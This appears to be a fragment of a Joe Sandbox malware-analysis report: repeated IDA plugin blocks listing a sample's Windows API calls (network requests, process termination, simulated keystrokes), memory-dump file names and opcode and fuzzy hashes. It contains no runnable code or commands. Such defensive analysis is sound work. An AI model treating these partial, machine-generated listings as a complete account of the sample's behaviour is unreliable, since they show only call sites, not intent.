                                                                                                                        • UnregisterHotKey.USER32(?), ref: 005116DD
                                                                                                                        • DestroyWindow.USER32(?), ref: 005524B9
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0055251E
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0055254B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                        • String ID: close all
                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                        • Opcode ID: 9541059b41f50802284718f7f863aeb41200e05843feb8a08d0f0ea2b5a615c4
                                                                                                                        • Instruction ID: 6868d8ac1e200b6f10c86dff4f2ce615e05f25ca166e739ad64f0d328634d7ee
                                                                                                                        • Opcode Fuzzy Hash: 9541059b41f50802284718f7f863aeb41200e05843feb8a08d0f0ea2b5a615c4
                                                                                                                        • Instruction Fuzzy Hash: 4AD1BD31701622CFEB19EF14D4A8A69FFA4BF46700F1441EEE94A6B252DB30AC56CF54
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005835E4
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • LoadStringW.USER32(005E2390,?,00000FFF,?), ref: 0058360A
                                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-2391861430
• Opcode ID: 6486e61e01dbd625323da5e8f3b72a790640b16d7bc6ace5e07fd1a04a48c3f8
• Instruction ID: 01a258eaff1156b73ec1966dd901fbecae17bf0f3fcd8015bee7ecbafa8b6670
• Opcode Fuzzy Hash: 6486e61e01dbd625323da5e8f3b72a790640b16d7bc6ace5e07fd1a04a48c3f8
• Instruction Fuzzy Hash: 0C516B7180020ABAEF14EBA0DC9AEEDBF38FF54700F144525F515721A1EB306B99DBA0
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005A3925
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 005A393A
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005A3954
• _wcslen.LIBCMT ref: 005A3999
• SendMessageW.USER32(?,00001057,00000000,?), ref: 005A39C6
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 005A39F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: @U=u$SysListView32
• API String ID: 2147712094-1908207174
• Opcode ID: f01334a2a6e1618b05379d73bd6a9e98ff72a4ae3d3d6b655d43d670c74be508
• Instruction ID: a1f9f8aba6b8e4cb58b309b81d8268a2f0420fcd9578ca1bfad196a03ca267d3
• Opcode Fuzzy Hash: f01334a2a6e1618b05379d73bd6a9e98ff72a4ae3d3d6b655d43d670c74be508
• Instruction Fuzzy Hash: A641D071A00219ABEB21DF64CC49BEE7FA9FF49354F100526F948E7281D7B49E84CB90
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005A2E1C
• GetWindowLongW.USER32(00000000,000000F0), ref: 005A2E4F
• GetWindowLongW.USER32(00000000,000000F0), ref: 005A2E84
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 005A2EB6
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005A2EE0
• GetWindowLongW.USER32(00000000,000000F0), ref: 005A2EF1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005A2F0B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID: @U=u
• API String ID: 2178440468-2594219639
• Opcode ID: a10d1cbca326467a2bf8d54234813347081dd57b8fbb8e05d43d1b0f40771c60
• Instruction ID: 1ece014ebc33cc210ac4a3980a161cae4336022ef94b4a8af5ac0834027a5871
• Opcode Fuzzy Hash: a10d1cbca326467a2bf8d54234813347081dd57b8fbb8e05d43d1b0f40771c60
• Instruction Fuzzy Hash: EC31E230604150AFDB25CF5CDC86F693BE9FBAA710F150164F944CF2A2CB71A884EB41
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058C272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0058C29A
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0058C2CA
• GetLastError.KERNEL32 ref: 0058C322
• SetEvent.KERNEL32(?), ref: 0058C336
• InternetCloseHandle.WININET(00000000), ref: 0058C341
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: 98d7d3055c148619287e8690006587210a279fd393ab516df3775419a9338fdd
• Instruction ID: 7790a83be29ec81c6077cf97ffaada539440bc72bc764fc059f9443af2f9ae57
• Opcode Fuzzy Hash: 98d7d3055c148619287e8690006587210a279fd393ab516df3775419a9338fdd
• Instruction Fuzzy Hash: 64317FB1500604AFD721AF649C88AAB7FFCFB59744F10891EF886A2240DB34DD099B70
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00553AAF,?,?,Bad directive syntax error,005ACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 005798BC
• LoadStringW.USER32(00000000,?,00553AAF,?), ref: 005798C3
  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00579987
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
• Opcode ID: cf11680bd29c287107490eb45fe4780d5aca51db3f22cd620debb7e661b1d1b6
• Instruction ID: 3543e181bf1943ab2dec9d3879c9b890ed7313b46a79ed3319eb8e9b89e6397c
• Opcode Fuzzy Hash: cf11680bd29c287107490eb45fe4780d5aca51db3f22cd620debb7e661b1d1b6
• Instruction Fuzzy Hash: 3D21943180021BBBDF11AF90DC5AEED7F75FF54300F044826F519620A1EB71AA58EB60
APIs
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
• Opcode ID: 35c5133244bc30a076be77cc1833b6e730a0e82258f093994e484aa6b43f7f69
• Instruction ID: 0c4c8da63d30988a50988f37c33bf85e18892c3feaad86dce66b3f4f2a063d49
• Opcode Fuzzy Hash: 35c5133244bc30a076be77cc1833b6e730a0e82258f093994e484aa6b43f7f69
• Instruction Fuzzy Hash: FF618771905312BFDB25AFB49C89AEE7FA5FF81318F04016DF9449B282EB359C489760
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058C182
• GetLastError.KERNEL32 ref: 0058C195
• SetEvent.KERNEL32(?), ref: 0058C1A9
  • Part of subcall function 0058C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058C272
  • Part of subcall function 0058C253: GetLastError.KERNEL32 ref: 0058C322
  • Part of subcall function 0058C253: SetEvent.KERNEL32(?), ref: 0058C336
  • Part of subcall function 0058C253: InternetCloseHandle.WININET(00000000), ref: 0058C341
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
• Opcode ID: cfdfb2378b12210eccc5a6195d0abf4f229cbddccc759d77990079f3f2e33ecd
• Instruction ID: ef4ebc6702325274392a1a6c707f3af78ee6a66c85632095370511702284238e
• Opcode Fuzzy Hash: cfdfb2378b12210eccc5a6195d0abf4f229cbddccc759d77990079f3f2e33ecd
• Instruction Fuzzy Hash: 46318075200601AFDB21AFB5DC48A66BFF9FF69300B00441DF997A2650DB31E814EB70
APIs
  • Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
  • Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
  • Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 005725BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005725DB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 005725DF
• MapVirtualKeyW.USER32(00000025,00000000), ref: 005725E9
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00572601
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00572605
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0057260F
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00572623
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00572627
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: e960b58145b9f48b7a03b2e116e9c117e650d9a739f5235b9cb96ab3c7203277
• Instruction ID: 6c4d37684ed6d9e3cd017629e0a6cd174e5f0399fcc14a979a4e7f699d898d2d
• Opcode Fuzzy Hash: e960b58145b9f48b7a03b2e116e9c117e650d9a739f5235b9cb96ab3c7203277
• Instruction Fuzzy Hash: 6E01D431390210BBFB1067699C8EF593F59EB9EB12F104001F318AF0D1C9E22449EA69
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00571449,?,?,00000000), ref: 0057180C
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 00571813
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00571449,?,?,00000000), ref: 00571828
                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00571449,?,?,00000000), ref: 00571830
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 00571833
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00571449,?,?,00000000), ref: 00571843
                                                                                                                        • GetCurrentProcess.KERNEL32(00571449,00000000,?,00571449,?,?,00000000), ref: 0057184B
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 0057184E
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00571874,00000000,00000000,00000000), ref: 00571868
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1957940570-0
                                                                                                                        • Opcode ID: 09e8468a245220e03fdfcd945d78faa8b3f697f1e8659289c2849273603031c6
                                                                                                                        • Instruction ID: 46fec11f13f0ccf2d9f6bbdd5053c8cba2646cac1bf36057acf69a3238f3dc8e
                                                                                                                        • Opcode Fuzzy Hash: 09e8468a245220e03fdfcd945d78faa8b3f697f1e8659289c2849273603031c6
                                                                                                                        • Instruction Fuzzy Hash: 5701BBB5340308BFE710ABA5DC4DF6B3FACEB9AB11F008411FA05DB1A1DA709804DB20
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0057D501
                                                                                                                          • Part of subcall function 0057D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0057D50F
                                                                                                                          • Part of subcall function 0057D4DC: CloseHandle.KERNEL32(00000000), ref: 0057D5DC
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0059A16D
                                                                                                                        • GetLastError.KERNEL32 ref: 0059A180
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0059A1B3
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0059A268
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0059A273
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0059A2C4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                        • Opcode ID: ac8467f77acd6d20e48965530fabdb13270f78c6b943394862487d9f12b233cc
                                                                                                                        • Instruction ID: e0704fa6ca13c87619b056634e1cb1450a27cccd01a9f3c3f23e821b2de89b9e
                                                                                                                        • Opcode Fuzzy Hash: ac8467f77acd6d20e48965530fabdb13270f78c6b943394862487d9f12b233cc
                                                                                                                        • Instruction Fuzzy Hash: 5D615E342042429FEB10DF18C498F55BFA1BF94318F14849CE4664B7A2C776ED45CBD2
                                                                                                                        APIs
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0057BCFD
                                                                                                                        • IsMenu.USER32(00000000), ref: 0057BD1D
                                                                                                                        • CreatePopupMenu.USER32 ref: 0057BD53
                                                                                                                        • GetMenuItemCount.USER32(015155B8), ref: 0057BDA4
                                                                                                                        • InsertMenuItemW.USER32(015155B8,?,00000001,00000030), ref: 0057BDCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                        • String ID: 0$2
                                                                                                                        • API String ID: 93392585-3793063076
                                                                                                                        • Opcode ID: 494da3f4b1aa77ae215433e21e77289b6ffb16378bea6289337b786cb5ad49f7
                                                                                                                        • Instruction ID: 2c2c97a1fb7455183e1d6cc62613661665a13b37a265714c6c8adc8c2d7d318f
                                                                                                                        • Opcode Fuzzy Hash: 494da3f4b1aa77ae215433e21e77289b6ffb16378bea6289337b786cb5ad49f7
                                                                                                                        • Instruction Fuzzy Hash: 72519F70A002059FEB21CFA8E888BAEBFF4BF55314F14C519E419D7291E7719944EB51
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00532D4B
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00532D53
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00532DE1
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00532E0C
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00532E61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: &HS$csm
                                                                                                                        • API String ID: 1170836740-2847240634
                                                                                                                        • Opcode ID: 60946cf2c6352f6042e4c9637a5862af839fd061c5a36f7a07a9601b591cae74
                                                                                                                        • Instruction ID: 0bea1da9764ef4f34922b89c5fa33763107bcb5945878550b89b573c13aae0ce
                                                                                                                        • Opcode Fuzzy Hash: 60946cf2c6352f6042e4c9637a5862af839fd061c5a36f7a07a9601b591cae74
                                                                                                                        • Instruction Fuzzy Hash: C841A434A01609EBCF10DF68C849A9EBFB5BF84324F148555E915AB392D731EE06CBD0
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0056F3AB,00000000,?,?,00000000,?,0056682C,00000004,00000000,00000000), ref: 005A824C
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 005A8272
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 005A82D1
                                                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 005A82E5
                                                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 005A830B
                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 005A832F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 642888154-2594219639
                                                                                                                        • Opcode ID: 302fec1ea4a281543b8c0a1868243c3f5b1eb525ff7c0e8d4391959ef76cc2c5
                                                                                                                        • Instruction ID: 1e32dd9f8b9f24350eac1461971b1f38191ecfe6c4d8894e7d7143417267ca4d
                                                                                                                        • Opcode Fuzzy Hash: 302fec1ea4a281543b8c0a1868243c3f5b1eb525ff7c0e8d4391959ef76cc2c5
                                                                                                                        • Instruction Fuzzy Hash: BC419F34601A44AFDF25CF14DC99BB87FE0BF5BB14F1851A9E6488F2A2CB31A845DB50
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00574C95
                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00574CB2
                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00574CEA
                                                                                                                        • _wcslen.LIBCMT ref: 00574D08
                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00574D10
                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00574D1A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 72514467-2594219639
                                                                                                                        • Opcode ID: d763830b7d5f75db12c6a3a52d3419033079fe7275d5753bdde1d5986edf1efe
                                                                                                                        • Instruction ID: ea13f0270ee074d96add9a742b390796300102f201a5ab985024bad39e9a3012
                                                                                                                        • Opcode Fuzzy Hash: d763830b7d5f75db12c6a3a52d3419033079fe7275d5753bdde1d5986edf1efe
                                                                                                                        • Instruction Fuzzy Hash: BD21DA31204111BBEB269B39BC49E7B7FACEF46750F108079F809CE191EB61DC00ABA0
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0057C913
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
